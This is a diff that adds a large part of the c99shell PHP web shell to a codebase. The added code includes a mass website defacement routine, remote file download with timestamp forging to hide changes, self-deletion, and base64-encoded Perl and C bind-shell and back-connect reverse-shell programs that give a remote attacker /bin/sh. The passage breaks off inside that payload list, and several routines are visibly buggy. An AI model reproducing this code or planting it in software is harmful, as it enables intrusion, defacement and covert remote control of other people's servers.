+if ($act == "mkfile")
+{
+ if ($mkfile != $d)
+ {
+  if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object alredy exists";}
+  elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: access denied";}
+  else {$act = "f"; $d = dirname($mkfile); if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";} $f = basename($mkfile);}
+ }
+ else {$act = $dspact = "ls";}
+}
+if ($act == "fsbuff")
+{
+ $arr_copy = $sess_data["copy"];
+ $arr_cut = $sess_data["cut"];
+ $arr = array_merge($arr_copy,$arr_cut);
+ if (count($arr) == 0) {echo "<center><b>Buffer is empty!</b></center>";}
+ else
+ {
+  echo "<b>File-System buffer</b><br><br>";
+  $ls_arr = $arr;
+  $disp_fullpath = true;
+  $act = "ls";
+ }
+}
+if ($act == "selfremove")
+{
+ if (!empty($submit))
+ {
+  if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using c99shell v.".$shver."!"; exit; }
+  else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";}
+ }
+ else
+ {
+  $v = array();
+  for($i=0;$i<8;$i++) {$v[] = "<a href=\"".$surl."\"><u><b>NO</b></u></a>";}
+  $v[] = "<a href=\"#\" onclick=\"if (confirm('Are you sure?')) document.location='".$surl."act=selfremove&submit=1';\"><u>YES</u></a>";
+  shuffle($v);
+  $v = join("&nbsp;&nbsp;&nbsp;",$v);
+  echo "<b>Self-remove: ".__FILE__." <br>Are you sure?</b><center>".$v."</center>";
+ }
+}
+if ($act == "massdeface")
+{
+ if (empty($deface_in)) {$deface_in = $d;}
+ if (empty($deface_name)) {$deface_name = "(.*)"; $deface_name_regexp = 1;}
+ if (empty($deface_text_wwo)) {$deface_text_regexp = 0;}
+
+ if (!empty($submit))
+ {
+  $found = array();
+  $found_d = 0;
+  $found_f = 0;
+
+  $text = $deface_text;
+  $text_regexp = $deface_text_regexp;
+  if (empty($text)) {$text = " "; $text_regexp = 1;}
+
+  $a = array
+  (
+   "name"=>$deface_name, "name_regexp"=>$deface_name_regexp,
+   "text"=>$text, "text_regexp"=>$text_regxp,
+   "text_wwo"=>$deface_text_wwo,
+   "text_cs"=>$deface_text_cs,
+   "text_not"=>$deface_text_not
+  );
+  $defacetime = getmicrotime();
+  $in = array_unique(explode(";",$deface_in));
+  foreach($in as $v) {c99fsearch($v);}
+  $defacetime = round(getmicrotime()-$defacetime,4);
+  if (count($found) == 0) {echo "<b>No files found!</b>";}
+  else
+  {
+   $disp_fullpath = true;
+   $act = $dspact = "ls";
+   if (!$deface_preview) {$actselect = "deface"; $actbox[] = $found; $notls = true;}
+   else {$ls_arr = $found;}
+  }
+ }
+ else
+ {
+  if (empty($deface_preview)) {$deface_preview = 1;}
+  if (empty($deface_html)) {$deface_html = "</div></table><br>Mass-defaced with c99shell v. ".$shver.", coded by tristram[<a href=\"http://ccteam.ru\">CCTeaM</a>].</b>";}
+ }
+ echo "<form method=\"POST\">";
+ if (!$submit) {echo "<big><b>Attention! It's a very dangerous feature, you may lost your data.</b></big><br><br>";}
+ echo "<input type=\"hidden\" name=\"d\" value=\"".$dispd."\">
+<b>Deface for (file/directory name): </b><input type=\"text\" name=\"deface_name\" size=\"".round(strlen($deface_name)+25)."\" value=\"".htmlspecialchars($deface_name)."\">&nbsp;<input type=\"checkbox\" name=\"deface_name_regexp\" value=\"1\" ".gchds($deface_name_regexp,1," checked")."> - regexp
+<br><b>Deface in (explode \";\"): </b><input type=\"text\" name=\"deface_in\" size=\"".round(strlen($deface_in)+25)."\" value=\"".htmlspecialchars($deface_in)."\">
+<br><br><b>Search text:</b><br><textarea name=\"deface_text\" cols=\"122\" rows=\"10\">".htmlspecialchars($deface_text)."</textarea>
+<br><br><input type=\"checkbox\" name=\"deface_text_regexp\" value=\"1\" ".gchds($deface_text_regexp,1," checked")."> - regexp
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"deface_text_wwo\" value=\"1\" ".gchds($deface_text_wwo,1," checked")."> - <u>w</u>hole words only
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"deface_text_cs\" value=\"1\" ".gchds($deface_text_cs,1," checked")."> - cas<u>e</u> sensitive
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"deface_text_not\" value=\"1\" ".gchds($deface_text_not,1," checked")."> - find files <u>NOT</u> containing the text
+<br><input type=\"checkbox\" name=\"deface_preview\" value=\"1\" ".gchds($deface_preview,1," checked")."> - <b>PREVIEW AFFECTED FILES</b>
+<br><br><b>Html of deface:</b><br><textarea name=\"deface_html\" cols=\"122\" rows=\"10\">".htmlspecialchars($deface_html)."</textarea>
+<br><br><input type=\"submit\" name=\"submit\" value=\"Deface\"></form>";
+ if ($act == "ls") {echo "<hr size=\"1\" noshade><b>Deface took ".$defacetime." secs</b><br><br>";}
+}
+if ($act == "search")
+{
+ if (empty($search_in)) {$search_in = $d;}
+ if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;}
+ if (empty($search_text_wwo)) {$search_text_regexp = 0;}
+
+ if (!empty($submit))
+ {
+  $found = array();
+  $found_d = 0;
+  $found_f = 0;
+  $a = array
+  (
+   "name"=>$search_name, "name_regexp"=>$search_name_regexp,
+   "text"=>$search_text, "text_regexp"=>$search_text_regxp,
+   "text_wwo"=>$search_text_wwo,
+   "text_cs"=>$search_text_cs,
+   "text_not"=>$search_text_not
+  );
+  $searchtime = getmicrotime();
+  $in = array_unique(explode(";",$search_in));
+  foreach($in as $v)
+  {
+   c99fsearch($v);
+  }
+  $searchtime = round(getmicrotime()-$searchtime,4);
+  if (count($found) == 0) {echo "<b>No files found!</b>";}
+  else
+  {
+   $ls_arr = $found;
+   $disp_fullpath = true;
+   $act = $dspact = "ls";
+  }
+ }
+ echo "<form method=\"POST\">
+<input type=\"hidden\" name=\"d\" value=\"".$dispd."\">
+<b>Search for (file/directory name): </b><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\">&nbsp;<input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".gchds($search_name_regexp,1," checked")."> - regexp
+<br><b>Search in (explode \";\"): </b><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\">
+<br><br><b>Text:</b><br><textarea name=\"search_text\" cols=\"122\" rows=\"10\">".htmlspecialchars($search_text)."</textarea>
+<br><br><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".gchds($search_text_regexp,1," checked")."> - regexp
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".gchds($search_text_wwo,1," checked")."> - <u>w</u>hole words only
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".gchds($search_text_cs,1," checked")."> - cas<u>e</u> sensitive
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".gchds($search_text_not,1," checked")."> - find files <u>NOT</u> containing the text
+<br><br><input type=\"submit\" name=\"submit\" value=\"Search\"></form>";
+ if ($act == "ls") {echo "<hr size=\"1\" noshade><b>Search took ".$searchtime." secs</b><br><br>";}
+}
+if ($act == "upload")
+{
+ $uploadmess = "";
+ $uploadpath = str_replace("\\","/",$uploadpath);
+ if (empty($uploadpath)) {$uploadpath = $d;}
+ elseif (substr($uploadpath,strlen($uploadpath)-1,1) != "/") {$uploadpath .= "/";}
+ if (!empty($submit))
+ {
+  global $HTTP_POST_FILES;
+  $uploadfile = $HTTP_POST_FILES["uploadfile"];
+  if (!empty($uploadfile[tmp_name]))
+  {
+   if (empty($uploadfilename)) {$destin = $uploadfile[name];}
+   else {$destin = $userfilename;}
+   if (!move_uploaded_file($uploadfile[tmp_name],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile[name]." (can't copy \"".$uploadfile[tmp_name]."\" to \"".$uploadpath.$destin."\"!<br>";}
+  }
+  elseif (!empty($uploadurl))
+  {
+   if (!empty($uploadfilename)) {$destin = $uploadfilename;}
+   else
+   {
+    $destin = explode("/",$destin);
+    $destin = $destin[count($destin)-1];
+    if (empty($destin))
+    {
+     $i = 0;
+     $b = "";
+     while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}}
+   }
+   if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Incorect url!</b><br>";}
+   else
+   {
+    $st = getmicrotime();
+    $content = @file_get_contents($uploadurl);
+    $dt = round(getmicrotime()-$st,4);
+    if (!$content) {$uploadmess .=  "Can't download file!<br>";}
+    else
+    {
+     if ($filestealth) {$stat = stat($uploadpath.$destin);}
+     $fp = fopen($uploadpath.$destin,"w");
+     if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!<br>";}
+     else
+     {
+      fwrite($fp,$content,strlen($content));
+      fclose($fp);
+      if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);}
+     }
+    }
+   }
+  }
+ }
+ if ($miniform)
+ {
+  echo "<b>".$uploadmess."</b>";
+  $act = "ls";
+ }
+ else
+ {
+  echo "<b>File upload:</b><br><b>".$uploadmess."</b><form enctype=\"multipart/form-data\" action=\"".$surl."act=upload&d=".urlencode($d)."\" method=\"POST\">
+Select file on your local computer: <input name=\"uploadfile\" type=\"file\"><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;or<br>
+Input URL: <input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\"><br><br>
+Save this file dir: <input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\"><br><br>
+File-name (auto-fill): <input name=uploadfilename size=25><br><br>
+<input type=checkbox name=uploadautoname value=1 id=df4>&nbsp;convert file name to lovercase<br><br>
+<input type=\"submit\" name=\"submit\" value=\"Upload\">
+</form>";
+ }
+}
+if ($act == "delete")
+{
+ $delerr = "";
+ foreach ($actbox as $v)
+ {
+  $result = false;
+  if (empty($v)) {}
+  $result = fs_rmobj($v);
+  if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."<br>";}
+  if (!empty($delerr)) {echo "<b>Deleting with errors:</b><br>".$delerr;}
+ }
+}
+if ($act == "deface")
+{
+ $deferr = "";
+ foreach ($actbox as $v)
+ {
+  $result = false;
+  if (empty($v)) {}
+  $result = fopen();
+  if (!$result) {$deferr .= "Can't delete ".htmlspecialchars($v)."<br>";}
+  if (!empty($delerr)) {echo "<b>Deleting with errors:</b><br>".$deferr;}
+ }
+}
+if (!$usefsbuff)
+{
+ if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "<center><b>Sorry, buffer is disabled. For enable, set directive \"USEFSBUFF\" as TRUE.</center>";}
+}
+else
+{
+ if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); c99_sess_put($sess_data); $act = "ls";}
+ if ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); c99_sess_put($sess_data); $act = "ls";}
+ if ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} $ls_arr = array_merge($sess_data["copy"],$sess_data["cut"]); c99_sess_put($sess_data); $act = "ls";}
+ 
+ if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); c99_sess_put($sess_data);}
+ elseif ($actpastebuff)
+ {
+  $psterr = "";
+  foreach($sess_data["copy"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
+   if ($copy_unset) {unset($sess_data["copy"][$k]);}
+  }
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
+   unset($sess_data["cut"][$k]);
+  }
+  c99_sess_put($sess_data);
+  if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
+ }
+ elseif ($actarcbuff)
+ {
+  $arcerr = "";
+  if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";}
+  else {$ext = ".tar.gz";}
+  
+  if ($ext == ".tar.gz")
+  {
+   $cmdline = "tar cfzv";
+  }
+  $objects = array_merge($sess_data["copy"],$sess_data["cut"]);
+  foreach($objects as $v)
+  {
+   $v = str_replace("\\","/",$v);
+   if (is_dir($v))
+   {
+    if (substr($v,strlen($v)-1,strlen($v)) != "/") {$v .= "/";}
+    $v .= "*";
+   }
+   $cmdline .= " ".$v;
+  }
+  $ret = `$cmdline`;
+  if (empty($ret)) {$arcerr .= "Can't call archivator!<br>";}
+  $ret = str_replace("\r\n","\n");
+  $ret = explode("\n",$ret);
+  if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}}
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+   if (in_array($v,$ret)) {fs_rmobj($v);}
+   unset($sess_data["cut"][$k]);
+  }
+  c99_sess_put($sess_data);
+  if (!empty($arcerr)) {echo "<b>Archivation errors:</b><br>".$arcerr;}
+  $act = "ls";
+ }
+ elseif ($actpastebuff)
+ {
+  $psterr = "";
+  foreach($sess_data["copy"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
+   if ($copy_unset) {unset($sess_data["copy"][$k]);}
+  }
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
+   unset($sess_data["cut"][$k]);
+  }
+  c99_sess_put($sess_data);
+  if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
+ }
+}
+if ($act == "ls")
+{
+ if (count($ls_arr) > 0) {$list = $ls_arr;}
+ else
+ {
+  $list = array();
+  if ($h = @opendir($d))
+  {
+   while ($o = readdir($h)) {$list[] = $d.$o;}
+   closedir($h);
+  }
+ }
+ if (count($list) == 0) {echo "<center><b>Can't open directory (".htmlspecialchars($d).")!</b></center>";}
+ else
+ {
+  //Building array
+  $tab = array();
+  $amount = count($ld)+count($lf);
+  $vd = "f"; //Viewing mode
+  if ($vd == "f")
+  {
+   $row = array();
+   $row[] = "<b>Name</b>";
+   $row[] = "<b>Size</b>";
+   $row[] = "<b>Modify</b>";
+   if (!$win)
+  {$row[] = "<b>Owner/Group</b>";}
+   $row[] = "<b>Perms</b>";
+   $row[] = "<b>Action</b>";
+   
+   $k = $sort[0];
+   if ((!is_numeric($k)) or ($k > count($row)-2)) {$k = 0;}
+   if ($sort[1] == "a")
+   {
+    $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_desc\" border=\"0\"></a>";
+   }
+   else
+   {
+    $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_asc\" border=\"0\"></a>";
+   }
+   
+   $row[$k] .= $y;
+   for($i=0;$i<count($row)-1;$i++)
+   {
+    if ($i != $k) {$row[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$i."a\">".$row[$i]."</a>";}
+   }
+   
+   $tab = array();
+   $tab[cols] = array($row);
+   $tab[head] = array();
+   $tab[dirs] = array();
+   $tab[links] = array();
+   $tab[files] = array();
+
+   foreach ($list as $v)
+   {
+    $o = basename($v);
+    $dir = dirname($v);
+     
+    if ($disp_fullpath) {$disppath = $v;}
+    else {$disppath = $o;}
+    $disppath = str2mini($disppath,60);
+  
+    if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";}
+    elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";}
+
+    $uo = urlencode($o);
+    $ud = urlencode($dir);
+    $uv = urlencode($v);
+
+    $row = array();
+
+    if ($o == ".")
+    {
+     $row[] = "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."\">".$o."</a>";
+     $row[] = "LINK";
+    }
+    elseif ($o == "..")
+    {
+     $row[] = "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>";
+     $row[] = "LINK";
+    }
+    elseif (is_dir($v))
+    {
+     if (is_link($v)) {$disppath .= " => ".readlink($v); $type = "LINK";}
+     else {$type = "DIR";}
+     $row[] =  "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>";
+     $row[] = $type;
+    }
+    elseif(is_file($v))
+    {
+     $ext = explode(".",$o);
+     $c = count($ext)-1;
+     $ext = $ext[$c];
+     $ext = strtolower($ext);
+     $row[] =  "<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;<a href=\"".$surl."act=f&f=".$uo."&d=".$ud."&\">".$disppath."</a>";
+     $row[] = view_size(filesize($v));
+    }
+    $row[] = date("d.m.Y H:i:s",filemtime($v));
+     
+    if (!$win)
+    {
+     $ow = @posix_getpwuid(fileowner($v));
+     $gr = @posix_getgrgid(filegroup($v));
+     $row[] = $ow["name"]."/".$gr["name"];
+    }
+         
+    if (is_writable($v)) {$row[] = "<font color=\"green\">".view_perms(fileperms($v))."</font>";}
+    else {$row[] = "<font color=\"red\">".view_perms(fileperms($v))."</font>";}
+
+    if (is_dir($v)) {$row[] = "<a href=\"".$surl."act=d&d=".$uv."\"><img src=\"".$surl."act=img&img=ext_diz\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;<input type=\"checkbox\" name=\"actbox[]\" value=\"".htmlspecialchars($v)."\">";}
+    else {$row[] = "<a href=\"".$surl."act=f&f=".$uo."&ft=info&d=".$ud."\"><img src=\"".$surl."act=img&img=ext_diz\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=edit&d=".$ud."\"><img src=\"".$surl."act=img&img=change\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=download&d=".$ud."\"><img src=\"".$surl."act=img&img=download\" title=\"Download\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;<input type=\"checkbox\" name=\"actbox[]\" value=\"".htmlspecialchars($v)."\">";}
+
+    if (($o == ".") or ($o == "..")) {$tab[head][] = $row;}
+    elseif (is_link($v)) {$tab[links][] = $row;}
+    elseif (is_dir($v)) {$tab[dirs][] = $row;}
+    elseif (is_file($v)) {$tab[files][] = $row;}
+   }   
+  }
+  $v = $sort[0];
+  function tabsort($a, $b)
+  {
+   global $v;
+   return strnatcasecmp(strip_tags($a[$v]), strip_tags($b[$v]));
+  }
+  usort($tab[dirs], "tabsort");
+  usort($tab[files], "tabsort");
+  if ($sort[1] == "a")
+  {
+   $tab[dirs] = array_reverse($tab[dirs]);
+   $tab[files] = array_reverse($tab[files]);
+  }
+  //Compiling table
+  $table = array_merge($tab[cols],$tab[head],$tab[dirs],$tab[links],$tab[files]);
+  echo "<b>Listing directory (".count($tab[files])." files and ".(count($tab[dirs])+count($tab[links]))." directories):</b><br><br>";
+  echo "<TABLE cellSpacing=0 cellPadding=0 width=100% bgColor=#333333 borderColorLight=#333333 border=0><form method=\"POST\">";
+  foreach($table as $row)
+  {
+   echo "<tr>\r\n";
+   foreach($row as $v) {echo "<td>".$v."</td>\r\n";}
+   echo "</tr>\r\n";
+  }
+  echo "</table><hr size=\"1\" noshade><p align=\"right\"><b><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\">";
+  if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff))
+  {
+   echo "<input type=\"submit\" name=\"actarcbuff\" value=\"Pack buffer to archive\">&nbsp;<input type=\"text\" name=\"actarcbuff_path\" value=\"archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=\"submit\" name=\"actpastebuff\" value=\"Paste\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=\"submit\" name=\"actemptybuff\" value=\"Empty buffer\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
+  }
+  echo "<select name=\"act\"><option value=\"".$act."\">With selected:</option>";
+  echo "<option value=\"delete\"".gchds($dspact,"delete"," selected").">Delete</option>";
+  echo "<option value=\"archive\"".gchds($dspact,"archive"," selected").">Archive</option>";
+  if ($usefsbuff)
+  {
+   echo "<option value=\"cut\"".gchds($dspact,"cut"," selected").">Cut</option>";
+   echo "<option value=\"copy\"".gchds($dspact,"copy"," selected").">Copy</option>";
+   echo "<option value=\"unselect\"".gchds($dspact,"unselect"," selected").">Unselect</option>";
+  }
+  echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></p>";
+  echo "</form>";
+ }
+}
+if ($act == "bind")
+{
+ $bndsrcs = array(
+"c99sh_bindport.pl"=>
+"IyEvdXNyL2Jpbi9wZXJsDQppZiAoQEFSR1YgPCAxKSB7ZXhpdCgxKTt9DQokcG9ydCA9ICRBUkdW".
+"WzBdOw0KZXhpdCBpZiBmb3JrOw0KJDAgPSAidXBkYXRlZGIiIC4gIiAiIHgxMDA7DQokU0lHe0NI".
+"TER9ID0gJ0lHTk9SRSc7DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsIFBGX0lORVQsIFNPQ0tfU1RS".
+"RUFNLCAwKTsNCnNldHNvY2tvcHQoUywgU09MX1NPQ0tFVCwgU09fUkVVU0VBRERSLCAxKTsNCmJp".
+"bmQoUywgc29ja2FkZHJfaW4oJHBvcnQsIElOQUREUl9BTlkpKTsNCmxpc3RlbihTLCA1MCk7DQph".
+"Y2NlcHQoWCxTKTsNCm9wZW4gU1RESU4sICI8JlgiOw0Kb3BlbiBTVERPVVQsICI+JlgiOw0Kb3Bl".
+"biBTVERFUlIsICI+JlgiOw0KZXhlYygiZWNobyBcIldlbGNvbWUgdG8gYzk5c2hlbGwhXHJcblxy".
+"XG5cIiIpOw0Kd2hpbGUoMSkNCnsNCiBhY2NlcHQoWCwgUyk7DQogdW5sZXNzKGZvcmspDQogew0K".
+"ICBvcGVuIFNURElOLCAiPCZYIjsNCiAgb3BlbiBTVERPVVQsICI+JlgiOw0KICBjbG9zZSBYOw0K".
+"ICBleGVjKCIvYmluL3NoIik7DQogfQ0KIGNsb3NlIFg7DQp9",
+
+"c99sh_bindport.c"=>
+"I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5".
+"cGVzLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4N".
+"CiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50IGFyZ2M7DQpjaGFy".
+"ICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1".
+"Y3Qgc29ja2FkZHJfaW4gcmVtb3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5f".
+"ZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9pKGFyZ3ZbMV0p".
+"KTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tm".
+"ZCA9IHNvY2tldChBRl9JTkVULFNPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigi".
+"c29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikmcmVtb3Rl".
+"LCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1h".
+"Y2NlcHQoc29ja2ZkLDAsMCk7DQogICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsN".
+"CiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk7DQogICBy".
+"ZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1Zikp".
+"DQogICBzeXN0ZW0oImVjaG8gd2VsY29tZSB0byBjOTlzaGVsbCAmJiAvYmluL2Jhc2ggLWkiKTsN".
+"CiAgIGVsc2UNCiAgIGZwcmludGYoc3RkZXJyLCJTb3JyeSIpOw0KICAgY2xvc2UobmV3ZmQpOw0K".
+"ICB9DQogfQ0KfQ0KaW50IGNocGFzcyhjaGFyICpiYXNlLCBjaGFyICplbnRlcmVkKSB7DQppbnQg".
+"aTsNCmZvcihpPTA7aTxzdHJsZW4oZW50ZXJlZCk7aSsrKSANCnsNCmlmKGVudGVyZWRbaV0gPT0g".
+"J1xuJykNCmVudGVyZWRbaV0gPSAnXDAnOyANCmlmKGVudGVyZWRbaV0gPT0gJ1xyJykNCmVudGVy".
+"ZWRbaV0gPSAnXDAnOw0KfQ0KaWYgKCFzdHJjbXAoYmFzZSxlbnRlcmVkKSkNCnJldHVybiAwOw0K".
+"fQ==",
+
+"c99sh_backconn.pl"=>
+"IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJ".
+"HN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2VjaG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZ".
+"DsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJ".
+"HRhcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0L".
+"CAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgnd".
+"GNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBka".
+"WUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yO".
+"iAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLR".
+"VQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlK".
+"FNURElOKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==",
+
+"c99sh_backconn.c"=>
+"I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5l".
+"dGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZk".
+"Ow0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJybSAtZiAiOyANCiBk".
+"YWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0g".
+"aHRvbnMoYXRvaShhcmd2WzJdKSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihh".
+"cmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJsZW4oYXJndlsy".
+"XSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsg".
+"DQogaWYgKChjb25uZWN0KGZkLCAoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1".
+"Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7DQogICBleGl0".
+"KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIo".
+"ZmQsIDApOw0KIGR1cDIoZmQsIDEpOw0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwi".
+"c2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="
+);
+
+ $bndportsrcs = array(
+"c99sh_bindport.pl"=>array("Using PERL","perl %path %port"),
+"c99sh_bindport.c"=>array("Using C","%path %port %pass")
+);
+
+ $bcsrcs = array(
+"c99sh_backconn.pl"=>array("Using PERL","perl %path %host %port"),
